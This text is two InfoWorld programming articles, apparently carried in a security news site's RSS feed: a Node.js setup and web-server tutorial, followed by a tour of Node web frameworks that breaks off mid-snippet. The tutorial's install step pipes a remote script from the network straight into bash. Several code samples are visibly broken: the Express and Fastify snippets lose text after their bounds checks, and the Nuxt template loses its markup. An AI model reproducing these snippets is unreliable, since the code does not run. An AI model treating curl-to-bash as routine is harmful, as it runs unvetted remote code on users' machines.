<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2254485/what-is-nodejs-javascript-runtime-explained.html">Node.js</a> is a popular and versatile cross-platform <a href="https://www.infoworld.com/article/2263137/what-is-javascript-the-full-stack-programming-language.html">JavaScript</a> runtime environment. Node was the first runtime to allow developers to run JavaScript outside the browser, opening a new world of possibilities in <a href="https://www.infoworld.com/article/4052419/9-vital-concepts-of-modern-javascript.html" data-type="link" data-id="https://www.infoworld.com/article/4052419/9-vital-concepts-of-modern-javascript.html">server-side JavaScript</a>. Its ease of use, massive ecosystem and performance characteristics have continued to secure its place as one of the most important technologies of the modern web.</p>



<p class="wp-block-paragraph">Anytime you need to run JavaScript on the server—be it for a systems utility, a REST API, data processing, or anything else—Node is an excellent choice. There are newer runtimes, namely <a href="https://www.infoworld.com/article/2336271/deno-vs-nodejs-which-is-better.html">Deno</a> and <a href="https://www.infoworld.com/article/2338008/explore-bunjs-the-all-in-one-javascript-runtime.html">Bun</a>, but Node remains the standard for server-side JavaScript.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/2252306/10-javascript-concepts-every-nodejs-developer-must-master.html">10 JavaScript concepts you need to succeed with Node</a>.</strong></p>



<h2 class="wp-block-heading">Getting started with Node</h2>



<p class="wp-block-paragraph">If you haven’t already experienced Node, this article will introduce you. We’ll step through installing Node and the NPM package manager, spinning up a simple web server, and using the Node cluster module to take advantage of multiple CPU cores.</p>



<p class="wp-block-paragraph">We’ll also look at using the NPM package manager to install additional Node modules and other JavaScript packages. And we’ll dip a toe into using a Node framework, in this case the ubiquitous <a href="https://www.infoworld.com/article/3615615/intro-to-express-js-endpoints-parameters-and-routes.html">Express server</a>, to create more feature-rich and flexible Node.js servers. Let’s get started!</p>



<h2 class="wp-block-heading">Installing Node and NPM</h2>



<p class="wp-block-paragraph">There are <a href="https://docs.npmjs.com/downloading-and-installing-node-js-and-npm">a few ways to install Node</a>, including the installer that <a href="https://docs.npmjs.com/downloading-and-installing-node-js-and-npm">Node itself provides</a>, but the recommended way is with a version manager. The most common version manager is <a href="https://github.com/nvm-sh/nvm">NVM</a>. This makes it easy to install Node and change versions when you need to. (There is also a Microsoft Windows-specific version called <a href="https://github.com/coreybutler/nvm-windows/releases">nvm-windows</a>.)</p>



<p class="wp-block-paragraph">NVM can be installed with an installer or using a CLI. In the following example, we use <code>curl</code>:</p>



<pre class="wp-block-code"><code>
$ curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.3/install.sh | bash</code></pre>



<p class="wp-block-paragraph">Once you have NVM installed, installing the most recent version of Node is simple:</p>



<pre class="wp-block-code"><code>
$ nvm install latest
</code></pre>



<p class="wp-block-paragraph">The <code>install latest</code> command makes the latest version available. Mine is Node 24.9.0, so I activate it with:</p>



<pre class="wp-block-code"><code>$ nvm use 24.9.0</code></pre>



<p class="wp-block-paragraph">Anytime you need to install another version of Node, you can use <code>nvm install</code> and <code>nvm use</code> to switch between them.</p>



<p class="wp-block-paragraph">You should now see Node available at your command prompt:</p>



<pre class="wp-block-code"><code>
$ node -v

v24.9.0</code></pre>



<p class="wp-block-paragraph">When you install Node this way, the Node package manager (NPM) is also installed:</p>



<pre class="wp-block-code"><code>$ npm -v

11.6.0</code></pre>



<p class="wp-block-paragraph">Note that using NVM also avoids potential permissions issues with NPM packages when using the installer.</p>



<h2 class="wp-block-heading">A simple web server in Node</h2>



<p class="wp-block-paragraph">To start simply, we can use <a href="https://nodejs.org/api/synopsis.html">an example from the Node homepage</a>. Copy the Synopsis example code as directed there and paste it into your code editor, then save it as <code>example.js</code>:</p>



<pre class="wp-block-code"><code>
const http = require('node:http');

const hostname = '127.0.0.1';
const port = 3000;

const server = http.createServer((req, res) =&gt; {
  res.statusCode = 200;
  res.setHeader('Content-Type', 'text/plain');
  res.end('Hello, InfoWorld!\n');
});

server.listen(port, hostname, () =&gt; {
  console.log(`Server running at http://${hostname}:${port}/`);
});</code></pre>



<p class="wp-block-paragraph">Open a shell in the directory where you saved the file, and run the file from your command line:</p>



<pre class="wp-block-code"><code>
$ node example.js

Server running at http://127.0.0.1:3000/</code></pre>



<p class="wp-block-paragraph">You can now go to the browser and check it out at <code>127.0.0:3000</code>, and you should see a simple greeting. Back at the terminal, press <strong>Control-C</strong> to stop the running server.</p>



<p class="wp-block-paragraph">Before we go further, let’s pull apart the code.</p>



<h3 class="wp-block-heading">Creating a simple HTTP server with Node</h3>



<p class="wp-block-paragraph">We start with the command:</p>



<pre class="wp-block-code"><code>const http = require(‘http’);</code></pre>



<p class="wp-block-paragraph">This is how you include a module in your code, in this case, the standard <a href="https://nodejs.org/api/http.html">http module</a>. (The <code>http</code> module ships with Node, so you don’t have to add it as a dependency.) This module provides the <a href="https://nodejs.org/api/http.html#http_http_createserver_requestlistener">createServer</a> and <code>listen</code> functions we’ll use later on.</p>



<p class="wp-block-paragraph">You might have noted that this example used a <a href="https://nodejs.org/api/modules.html">CommonJS</a> import. While older, this style of import is still very common in Node programs as well as some documentation. However, it’s gradually being phased out in favor of <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Modules">ES Modules</a> (ESM), the standardized module system introduced in ECMAScript 2015. An ESM import would look like this:</p>



<pre class="wp-block-code"><code>import http from 'http';</code></pre>



<p class="wp-block-paragraph">After we import the <code>http</code> module, we define a couple of values we need (<code>hostname</code> and <code>port</code>):</p>



<pre class="wp-block-code"><code>const hostname = '127.0.0.1';

const port = 3000;</code></pre>



<p class="wp-block-paragraph">Next, we create the server:</p>



<pre class="wp-block-code"><code>const server = http.createServer((req, res) =&gt; {
  res.statusCode = 200;
  res.setHeader(‘Content-Type’, ‘text/plain’);
  res.end(‘Hello World\n’);
});</code></pre>



<p class="wp-block-paragraph">The <code>creatServer </code>command accepts a callback function, which we define using the fat arrow notation. The callback function passes two arguments, the request (<code>req</code>) and response (<code>res</code>) objects needed to handle HTTP requests. The <code>req</code> argument contains the incoming HTTP request, which in this case is ignored. The <code>res.end</code> method sets the response data to <code>‘Hello InfoWorld\n’</code> and tells the server that it is done creating the response.</p>



<p class="wp-block-paragraph">Next, we have:</p>



<pre class="wp-block-code"><code>server.listen(port, hostname, () =&gt; {
  console.log(`Server running at http://${hostname}:${port}/`);
});</code></pre>



<p class="wp-block-paragraph">The <code>server.listen</code> function accepts three arguments. The first two are the <code>port</code> and <code>hostname</code>, and the third is a callback that is executed when the server is ready (in this case, it prints a message to the console).</p>



<p class="wp-block-paragraph">Having all the event handlers defined as callbacks is one of the most subtle and powerful parts of Node. It’s key to Node’s asynchronous non-blocking architecture.</p>



<p class="wp-block-paragraph">Node.js runs on <a href="https://www.infoworld.com/article/4052419/9-vital-concepts-of-modern-javascript.html">an event loop</a>, which always reverts to handling events when not otherwise engaged. It’s like a busy order-taker continually picking up orders and then updating the order-maker with their order. We receive updates via the callbacks.</p>



<h2 class="wp-block-heading">A multi-process web server with Node</h2>



<p class="wp-block-paragraph">Node’s asynchronous, non-blocking nature makes it good at handling many parallel requests, but it’s not truly concurrent by default. There are <a href="https://www.infoworld.com/article/2513020/intro-to-multithreaded-javascript.html">a few ways to make a Node application use multiple threads</a> for true concurrency. One of the simplest is to use the <a href="https://pm2.keymetrics.io/">PM2 project</a>, which lets you run the same Node application in many processes.</p>



<p class="wp-block-paragraph">By launching each application instance in its own process, the operating system can make use of multiple cores on the machine. This is not usually a concern at first, but it’s a key performance consideration to bear in mind.</p>



<p class="wp-block-paragraph">You can install PM2 globally like so:</p>



<pre class="wp-block-code"><code>$ npm install -g pm2</code></pre>



<p class="wp-block-paragraph">For our example, we want to make it obvious that the different processes are handling requests. We can achieve that goal with a small change to the server:</p>



<pre class="wp-block-code"><code>res.end(`Hello, InfoWorld! Handled by ${process.pid}`);</code></pre>



<p class="wp-block-paragraph">The <code>process.pid </code>field is a built-in environment variable, providing a unique ID for the currently running process in Node. Once PM2 is installed and the app is updated, we can run it like so:</p>



<pre class="wp-block-code"><code>$ pm2 start example.js -i max</code></pre>



<p class="wp-block-paragraph">That should launch several instances of the same program, as shown here:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/11/Node-tutorial-fig3v2.png?w=1024" alt="Screenshot of a multi-process Node-based web server running several instances of the same program." class="wp-image-4089570" width="1024" height="575" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Matthew Tyson</p></div>



<p class="wp-block-paragraph">Then, if you open multiple windows, you can see the unique ID of each instance:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/11/Node-tutorial-fig2v2.png?w=1024" alt="Screenshot of a Node-based multi-process web server showing the unique ID of each instance." class="wp-image-4089571" width="1024" height="536" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Matthew Tyson</p></div>



<h2 class="wp-block-heading">An Express web server with Node</h2>



<p class="wp-block-paragraph">For our final example, we’ll look at setting up an <a href="https://www.infoworld.com/article/3615615/intro-to-express-js-endpoints-parameters-and-routes.html">Express</a> web server in Node. This time we’ll use NPM to download Express and its dependencies. NPM is one of the greatest storehouses of software on the planet, with literally <a href="https://www.npmjs.com/">millions of libraries available</a>. Knowing how to use it is essential for working with Node.</p>



<p class="wp-block-paragraph">NPM works just like other package managers you may have used, letting you define and install dependencies in a structured way. To install Express, go to your project directory and type:</p>



<pre class="wp-block-code"><code>$ npm install express</code></pre>



<p class="wp-block-paragraph">Node should respond with something like: <code>added 68 packages in 5s</code>.</p>



<p class="wp-block-paragraph">You will notice several directories have been added to a <code>/node_modules</code> directory. Those are all the dependencies needed for Express. You usually don’t have to interact with <code>node_modules</code> yourself, but it’s good to know that’s where things are saved.</p>



<p class="wp-block-paragraph">Now look at the <code>package.json</code> file, which will have something like this in it:</p>



<pre class="wp-block-code"><code>{
  "dependencies": {
	"express": "^5.1.0"
  }
}</code></pre>



<p class="wp-block-paragraph">This is how dependencies are defined in NPM. It says the application needs the express dependency at version 5.1.0 (or greater).</p>



<h3 class="wp-block-heading">Setting up the Express server in Node</h3>



<p class="wp-block-paragraph">Express is one of the most-deployed pieces of software on the Internet. It can be a minimalist server framework for Node that handles all the essentials of HTTP, and it’s also expandable using “middleware” plugins.</p>



<p class="wp-block-paragraph">Since we’ve already installed Express, we can jump right into defining a server. Open the <code>example.js</code> file we used previously and replace the contents with this simple Express server:</p>



<pre class="wp-block-code"><code>import express from 'express';

const app = express();
const port = 3000;

app.get('/', (req, res) =&gt; {
  res.send('Hello, InfoWorld!');
});

app.listen(port, () =&gt; {
  console.log(`Express server at http://localhost:${port}`);
});</code></pre>



<p class="wp-block-paragraph">This program does the same thing as our earlier <code>http</code> module version. The most important change is that we’ve added routing. Express makes it easy for us to associate a URL path, like the root path (<code>‘/’</code>), with the handler function.</p>



<p class="wp-block-paragraph">If we wanted to add another path, it could look like this:</p>



<pre class="wp-block-code"><code>app.get('/about', (req, res) =&gt; {
  res.send('This is the About page.');
});</code></pre>



<p class="wp-block-paragraph">Once we have the basic web server set up with one or more paths, we’ll probably need to create a few API endpoints that respond with JSON. Here’s an example of a route that returns a JSON object:</p>



<pre class="wp-block-code"><code>app.get('/api/user', (req, res) =&gt; {
  res.json({
	id: 1,
	name: 'John Doe',
	role: 'Admin'
  });
});</code></pre>



<p class="wp-block-paragraph">That’s a simple example, but it gives you a taste of working with Express in Node.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">In this article you’ve seen how to install Node and NPM and how to set up both simple and more advanced web servers in Node. Although we’ve only touched on the basics, these examples demonstrate many elements that are required for all Node applications, including the ability to import modules.</p>



<p class="wp-block-paragraph">Whenever you need a package to do something in Node, you will more than likely find it available on <a href="https://www.npmjs.com/">NPM</a>. Visit the official site and use the search feature to find what you need. For more information about a package, you can use the <a href="http://npms.io/">npms.io</a> tool. Keep in mind that a project’s health depends on its weekly download metric (visible on NPM for the package itself). You can also check a project’s GitHub page to see how many stars it has and how many times it’s been forked; both are good measures of success and stability. Another important metric is how recently and frequently the project is updated and maintained. That information is also visible on a project’s GitHub Insights page.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The complete guide to Node.js frameworks]]></title>
<description><![CDATA[Node.js is one of the most popular server-side platforms, especially for web applications. It gives you non-blocking JavaScript without a browser, plus an enormous ecosystem. That ecosystem is one of Node’s chief strengths, making it a go-to option for server development.



This article is a qui...]]></description>
<link>https://tsecurity.de/de/3665672/ai-nachrichten/the-complete-guide-to-nodejs-frameworks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665672/ai-nachrichten/the-complete-guide-to-nodejs-frameworks/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:36 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2254485/what-is-nodejs-javascript-runtime-explained.html">Node.js</a> is one of the most popular server-side platforms, especially for web applications. It gives you non-blocking JavaScript without a browser, plus an enormous ecosystem. That ecosystem is one of Node’s chief strengths, making it a go-to option for server development.</p>



<p class="wp-block-paragraph">This article is a quick tour of the most popular web frameworks for <a href="https://www.infoworld.com/article/2257958/nodejs-tutorial-get-started-with-nodejs.html">server development on Node.js</a>. We’ll look at minimalist tools like Express.js, batteries-included frameworks like Nest.js, and full-stack frameworks like Next.js. You’ll get an overview of the frameworks and a taste of what it’s like to write a simple server application in each one.</p>



<h2 class="wp-block-heading">Minimalist web frameworks</h2>



<p class="wp-block-paragraph">When it comes to Node web frameworks, <em>minimalist</em> doesn’t mean limited. Instead, these frameworks provide the essential features required to do the job for which they are intended. The frameworks in this list also tend to be highly extensible, so you can customize them as needed. With minimalist frameworks, pluggable extensibility is the name of the game.</p>



<h3 class="wp-block-heading">Express.js</h3>



<p class="wp-block-paragraph">At over 47 million weekly downloads on npm, Express is one of the most-installed software packages of all time—and for good reason. Express gives you basic web endpoint routing and request-and-response handling inside an extensible framework that is easy to understand. Most other frameworks in this category have adopted the basic style of describing a route from Express. This framework is the obvious choice when you simply need to create some routes for HTTP, and you don’t mind a DIY approach for anything extra.</p>



<p class="wp-block-paragraph">Despite its simplicity, Express is fully-featured when it comes to things like route parameters and request handling. Here is a simple Express endpoint that returns a dog breed based on an ID:</p>



<pre class="wp-block-code"><code>import express from 'express';

const app = express();
const port = 3000;

// In-memory array of dog breeds
const dogBreeds = [
  "Shih Tzu",
  "Great Pyrenees",
  "Tibetan Mastiff",
  "Australian Shepherd"
];
app.get('/dogs/:id', (req, res) =&gt; {
  // Convert the id from a string to an integer
  const id = parseInt(req.params.id, 10);

  // Check if the id is a valid number and within the array bounds
  if (id &gt;= 0 &amp;&amp; id  {
  console.log(`Server running at http://localhost:${port}`);
});</code></pre>



<p class="wp-block-paragraph">You can easily see how the route is defined here: a string representation of a URL, followed by a function that receives a request and response object. The process of creating the server and listening on a port is simple.</p>



<p class="wp-block-paragraph">If you are coming from a framework like Next, the biggest thing you might notice about Express is that it lacks a file-system based router. On the other hand, it offers a huge range of <a href="https://expressjs.com/en/resources/middleware.html">middleware plugins</a> to help with essential functions like security.</p>



<h3 class="wp-block-heading">Koa</h3>



<p class="wp-block-paragraph"><a href="https://koajs.com/">Koa</a> was created by the original creators of Espress, who took the lessons learned from that project and used them for a fresh take on the JavaScript server. Koa’s focus is providing a minimalist core engine. It uses <code>async</code>/<code>await</code> functions for middleware rather than chaining with <code>next()</code> calls. This can give you a cleaner server, especially when there are many plugins. It also makes the error handling less clunky for middleware.</p>



<p class="wp-block-paragraph">Koa also differs from Express by exposing a unified context object instead of separate request and response objects, which makes for a somewhat less cluttered API. Here is how Koa manages the same route we created in Express:</p>



<pre class="wp-block-code"><code>router.get('/dogs/:id', (ctx) =&gt; {
  const id = parseInt(ctx.params.id, 10);

  if (id &gt;= 0 &amp;&amp; id &lt; dogBreeds.length) {
    ctx.status = 200;
    ctx.body = { breed: dogBreeds[id] };
  } else {
    ctx.status = 404;
    ctx.body = { error: 'Dog breed not found' };
  }
});</code></pre>



<p class="wp-block-paragraph">The only real difference is the combined context object.</p>



<p class="wp-block-paragraph">Koa’s middleware mechanism is also worth a look. Here’s a simple logging plugin in Koa:</p>



<pre class="wp-block-code"><code>const logger = async (ctx, next) =&gt; {
  await next(); // This passes control to the router
  console.log(`${ctx.method} ${ctx.url} - ${ctx.status}`);
};

// Use the logger middleware for all requests
app.use(logger);	</code></pre>



<h3 class="wp-block-heading">Fastify</h3>



<p class="wp-block-paragraph"><a href="https://fastify.dev/">Fastify</a> lets you define schemas for your APIs. This is an up-front, formal mechanism for describing what the server supports:</p>



<pre class="wp-block-code"><code>const schema = {
  params: {
    type: 'object',
    properties: {
      id: { type: 'integer' }
    }
  },
  response: {
    200: {
      type: 'object',
      properties: {
        breed: { type: 'string' }
      }
    },
    404: {
      type: 'object',
      properties: {
        error: { type: 'string' }
      }
    }
  }
};

fastify.get('/dogs/:id', { schema }, (request, reply) =&gt; {
  const id = request.params.id;

  if (id &gt;= 0 &amp;&amp; id  {
  if (err) {
    fastify.log.error(err);
    process.exit(1);
  }
  console.log(`Server running at ${address}`);
});</code></pre>



<p class="wp-block-paragraph">From this example, you can see the actual endpoint definition is similar to Express and Koa, but we define a schema for the API. The schema is not strictly necessary; it is possible to define endpoints without it. In that case, Fastify behaves much like Express, but with superior performance.</p>



<h3 class="wp-block-heading">Hono</h3>



<p class="wp-block-paragraph"><a href="https://hono.dev/">Hono</a> emphasizes simplicity. You can define a server and endpoint with as little as:</p>



<pre class="wp-block-code"><code>const app = new Hono()
app.get('/', (c) =&gt; c.text('Hello, Infoworld!'))  </code></pre>



<p class="wp-block-paragraph">And here’s how our dog breed example looks:</p>



<pre class="wp-block-code"><code>app.get('/dogs/:id', (c) =&gt; {
  // Get the id parameter from the request URL
  const id = parseInt(c.req.param('id'), 10);

  // Check if the id is a valid number and within the array bounds
  if (id &gt;= 0 &amp;&amp; id &lt; dogBreeds.length) {
    // Return a JSON response with a 200 OK status (default)
    return c.json({ breed: dogBreeds[id] });
  } else {
    // Set status to 404 and return a JSON error message
    c.status(404);
    return c.json({ error: 'Dog breed not found' });
  }
});</code></pre>



<p class="wp-block-paragraph">As you can see, Hono provides a unified context object, similar to Koa.</p>



<h3 class="wp-block-heading">Nitro.js</h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/4061129/intro-to-nitro-the-server-engine-built-for-modern-javascript.html">Nitro</a> is the back end for several full-stack frameworks, including Nuxt.js. As part of the UnJS ecosystem, Nitro goes further than Express in providing cloud-native tooling support. It includes a universal storage adapter and deployment support for serverless and cloud deployment targets.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/4061129/intro-to-nitro-the-server-engine-built-for-modern-javascript.html">Intro to Nitro: The server engine built for modern JavaScript</a>.</strong></p>



<p class="wp-block-paragraph">Like Next.js, Nitro uses filesystem-based routing, so our Dog Finder API would exist at the following filepath:</p>



<pre class="wp-block-code"><code>/api/dogs/:id</code></pre>



<p class="wp-block-paragraph">The handler might look like this:</p>



<pre class="wp-block-code"><code>export default defineEventHandler((event) =&gt; {
  // Get the dynamic parameter from the event context
  const { id } = getRouterParams(event);
  const parsedId = parseInt(id, 10);

  // Check if the id is a valid number and within the array bounds
  if (parsedId &gt;= 0 &amp;&amp; parsedId &lt; dogBreeds.length) {
    // Nitro handles JSON serialization
    return { breed: dogBreeds[parsedId] };
  } else {
    setResponseStatus(event, 404);
    return { error: 'Dog breed not found' };
  }
});</code></pre>



<p class="wp-block-paragraph">Nitro inhabits the middle ground between a pure tool like Express and a full-blown stack, which is why full-stack front ends often use Nitro on the back end.</p>



<h2 class="wp-block-heading">Batteries-included frameworks</h2>



<p class="wp-block-paragraph">Although Express and other minimalist frameworks set the standard for simplicity, more opinionated frameworks can be useful if you want additional features out of the box.</p>



<h3 class="wp-block-heading">Nest.js</h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/4091407/intro-to-nest-js-server-side-javascript-development-on-node.html">Nest</a> is a progressive framework built with <a href="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html">TypeScript</a> from the ground up. Nest is actually a layer on top of Express (or Fastify), with additional services. It is inspired by Angular and incorporates the kind of architectural support found there. In particular, it includes dependency injection. Nest also uses annotated controllers for endpoints.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/4091407/intro-to-nest-js-server-side-javascript-development-on-node.html">Intro to Nest.js: Server-side JavaScript development on Node</a>.</strong></p>



<p class="wp-block-paragraph">Here is an example of injecting a dog finder provider into a controller:</p>



<pre class="wp-block-code"><code>// The provider:
import { Injectable, NotFoundException } from '@nestjs/common';

// The @Injectable() decorator marks this class as a provider.
@Injectable()
export class DogsService {
  private readonly dogBreeds = [
    "Shih Tzu",
    "Great Pyrenees",
    "Tibetan Mastiff",
    "Australian Shepherd"
  ];

  findOne(id: number) {
    if (id &gt;= 0 &amp;&amp; id &lt; this.dogBreeds.length) {
      return { breed: this.dogBreeds[id] };
    }
    // NestJS has built-in HTTP exception classes for common errors.
    throw new NotFoundException('Dog breed not found');
  }
}

// The controller

import { Controller, Get, Param, ParseIntPipe } from '@nestjs/common';
import { DogsService } from './dogs.service';

@Controller('dogs')
export class DogsController {
  // NestJS injects the DogsService through the constructor.
  // The 'private readonly' syntax is a TypeScript shorthand
  // to both declare and initialize the dogsService member.
  constructor(private readonly dogsService: DogsService) {}

  @Get(':id')
  findOneDog(@Param('id', ParseIntPipe) id: number) {
    // We can now use the service's methods. The ParseIntPipe
    // automatically converts the string URL parameter to a number.
    return this.dogsService.findOne(id);
  }
}</code></pre>



<p class="wp-block-paragraph">This style is typical of dependency injection frameworks like <a href="https://www.infoworld.com/article/3964105/catching-up-with-angular-19.html" data-type="link" data-id="https://www.infoworld.com/article/3964105/catching-up-with-angular-19.html">Angular</a>, as well as <a href="https://www.infoworld.com/article/4083578/a-fresh-look-at-the-spring-framework.html" data-type="link" data-id="https://www.infoworld.com/article/4083578/a-fresh-look-at-the-spring-framework.html">Spring</a>. It allows you to declare components as injectable, then consume them anywhere you need them.</p>



<p class="wp-block-paragraph">In Nest, we’d just add these as modules to make them live.</p>



<h3 class="wp-block-heading">Adonis.js</h3>



<p class="wp-block-paragraph">Like Nest, <a href="https://adonisjs.com/">Adonis</a> provides a controller layer that you wire together with routes. Adonis is inspired by the model-view-controller (MVC) pattern, so it also includes a layer for modelling data and accessing stores via an ORM. Finally, it provides a validator layer for ensuring data meets requirements.</p>



<p class="wp-block-paragraph">Routes in Adonis are very simple:</p>



<pre class="wp-block-code"><code>Route.get('/dogs/:id', [DogsController, 'show'])</code></pre>



<p class="wp-block-paragraph">In this case, <code>DogsController</code> would be the handler for the route, and might look something like:</p>



<pre class="wp-block-code"><code>import type { HttpContextContract } from '@ioc:Adonis/Core/HttpContext'  // Note, ioc means inversion of control, similar to dependency injection

export default class DogsController {
  // The 'show' method handles the logic for the route
  public async show({ params, response }: HttpContextContract) {
    const id = Number(params.id);

    // Check if the id is a valid number and within the array bounds
    if (!isNaN(id) &amp;&amp; id &gt;= 0 &amp;&amp; id &lt; this.dogBreeds.length) {
      // Use the response object to send a 200 OK JSON response
      return response.ok({ breed: this.dogBreeds[id] });
    } else {
      // Send a 404 Not Found response
      return response.notFound({ error: 'Dog breed not found' });
    }
  }
}</code></pre>



<p class="wp-block-paragraph">Of course, in a real application, we could define a model layer to handle the actual data access.</p>



<h3 class="wp-block-heading">Sails</h3>



<p class="wp-block-paragraph"><a href="https://sailsjs.com/">Sails</a> is another MVC-style framework. It is one of the original one-stop-shopping frameworks for Node and includes an ORM layer (<a href="https://sailsjs.com/documentation/reference/waterline-orm">Waterline</a>), API generation (<a href="https://sailsjs.com/documentation/reference/blueprint-api">Blueprints</a>), and realtime support, including <a href="https://www.infoworld.com/article/3552685/websockets-under-the-hood.html" data-type="link" data-id="https://www.infoworld.com/article/3552685/websockets-under-the-hood.html">WebSockets</a>.</p>



<p class="wp-block-paragraph">Sails strives for conventional operation. For example, here’s how you might define a simple model for dogs:</p>



<pre class="wp-block-code"><code>/**
 * Dog.js
 *
 * @description :: A model definition represents a database table/collection.
 * @docs        :: https://sailsjs.com/docs/concepts/models
 */
module.exports = {
  attributes: {
    breed: { type: 'string', required: true },
  },
};</code></pre>



<p class="wp-block-paragraph">If you run this in Sails, the framework will generate default routes and wire up a <a href="https://www.infoworld.com/article/2265797/how-to-choose-the-right-nosql-database-2.html" data-type="link" data-id="https://www.infoworld.com/article/2265797/how-to-choose-the-right-nosql-database-2.html">NoSQL</a> or SQL datastore based on your configuration. Sails also provides the option to override these defaults and add in your own custom logic.</p>



<h2 class="wp-block-heading">Full-stack frameworks</h2>



<p class="wp-block-paragraph">Also known as <a href="https://www.infoworld.com/article/3486850/state-of-javascript-insights-from-the-latest-javascript-community-survey.html">meta-frameworks</a>, these tools combine a front-end framework with a solid back end and various CLI niceties like build chains.</p>



<h3 class="wp-block-heading">Next.js</h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/4078213/next-js-16-features-explicit-caching-ai-powered-debugging.html">Next</a> is a React-based framework built by Vercel. It is largely responsible for the huge growth in popularity of these types of frameworks. Next was the first framework to bring together back-end API definitions with the front end that consumes them. It also introduced file-system routing. In Next and other full-stack frameworks, you get both parts of your stack in one place and you can run them together during development.</p>



<p class="wp-block-paragraph">In Next, we could define a route at <code>pages/api/dogs/[id].js</code> like so:</p>



<pre class="wp-block-code"><code>export default function handler(req, res) {
  // `req.query.id` comes from the dynamic filename [id].js
  const { id } = req.query;
  const parsedId = parseInt(id, 10);

  if (parsedId &gt;= 0 &amp;&amp; parsedId &lt; dogBreeds.length) {
    // If the ID is valid, return the data
    res.status(200).json({ breed: dogBreeds[parsedId] });
  } else {
    // Otherwise, return a 404 error
    res.status(404).json({ error: 'Dog breed not found' });
  }
}</code></pre>



<p class="wp-block-paragraph">We’d then define the UI component to interact with this route at <code>pages/dogs/[id].js</code>:</p>



<pre class="wp-block-code"><code>import React from 'react';

// This is the React component that renders the page.
// It receives the `dog` object as a prop from getServerSideProps.
function DogPage({ dog }) {
  // Handle the case where the dog wasn't found
  if (!dog) {
    return <h1>Dog Breed Not Found</h1>;
  }

  return (
    <div>
      <h1>Dog Breed Profile</h1>
      <p>Breed Name: <strong>{dog.breed}</strong></p>
    </div>
  );
}

// This function runs on the server before the page is sent to the browser.
export async function getServerSideProps(context) {
  const { id } = context.params; // Get the ID from the URL

  // Fetch data from our own API route on the server.
  const res = await fetch(`http://localhost:3000/api/dogs/${id}`);
  
  // If the fetch was successful, parse the JSON.
  const dog = res.ok ? await res.json() : null;

  // Pass the fetched data to the DogPage component as props.
  return {
    props: {
      dog,
    },
  };
}

export default DogPage;</code></pre>



<h3 class="wp-block-heading">Nuxt.js</h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/4025936/nuxt-4-0-improves-project-organization-data-fetching-typescript-support.html">Nuxt</a> is the same idea as Next, but applied to the <a href="http://vue.js/">Vue</a> front end. The basic pattern is the same, though. First, we’d define a back-end route:</p>



<pre class="wp-block-code"><code>// server/api/dogs/[id].js

// defineEventHandler is Nuxt's helper for creating API handlers.
export default defineEventHandler((event) =&gt; {
  // Nuxt automatically parses route parameters.
  const id = getRouterParam(event, 'id');
  const parsedId = parseInt(id, 10);

  if (parsedId &gt;= 0 &amp;&amp; parsedId &lt; dogBreeds.length) {
    return { breed: dogBreeds[parsedId] };
  } else {
    // Helper to set the status code and return an error.
    setResponseStatus(event, 404);
    return { error: 'Dog breed not found' };
  }
});</code></pre>



<p class="wp-block-paragraph">Then, we’d create the UI file in Vue:</p>



<pre class="wp-block-code"><code>// pages/dogs/[id].vue


  <div>
    <div>
      Loading...
    </div>
    <div>
      <h1>{{ error.data.error }}</h1>
    </div>
    <div>
      <h1>Dog Breed Profile</h1>
      <p>Breed Name: <strong>{{ dog.breed }}</strong></p>
    </div>
  </div>


</code></pre>



<h3 class="wp-block-heading">SvelteKit</h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2337758/intro-to-sveltekit-10-the-full-stack-framework-for-svelte.html">SvelteKit</a> is the full-stack framework for the Svelte front end. It’s similar to Next and Nuxt, with the main difference being the front-end technology.</p>



<p class="wp-block-paragraph">In SvelteKit, a back-end route looks like so:</p>



<pre class="wp-block-code"><code>// src/routes/api/dogs/[id]/+server.js

import { json, error } from '@sveltejs/kit';

// This is our data source for the example.
const dogBreeds = [
  "Shih Tzu",
  "Australian Cattle Dog",
  "Great Pyrenees",
  "Tibetan Mastiff",
];

/** @type {import('./$types').RequestHandler} */
export function GET({ params }) {
  // The 'id' comes from the [id] directory name.
  const id = parseInt(params.id, 10);

  if (id &gt;= 0 &amp;&amp; id &lt; dogBreeds.length) {
    // The json() helper creates a valid JSON response.
    return json({ breed: dogBreeds[id] });
  }

  // The error() helper is the idiomatic way to return HTTP errors.
  throw error(404, 'Dog breed not found');
}</code></pre>



<p class="wp-block-paragraph">SvelteKit usually splits the UI into two components. The first component is for loading the data (which can then be run on the server):</p>



<pre class="wp-block-code"><code>// src/routes/dogs/[id]/+page.js

import { error } from '@sveltejs/kit';

/** @type {import('./$types').PageLoad} */
export async function load({ params, fetch }) {
  // Use the SvelteKit-provided `fetch` to call our API endpoint.
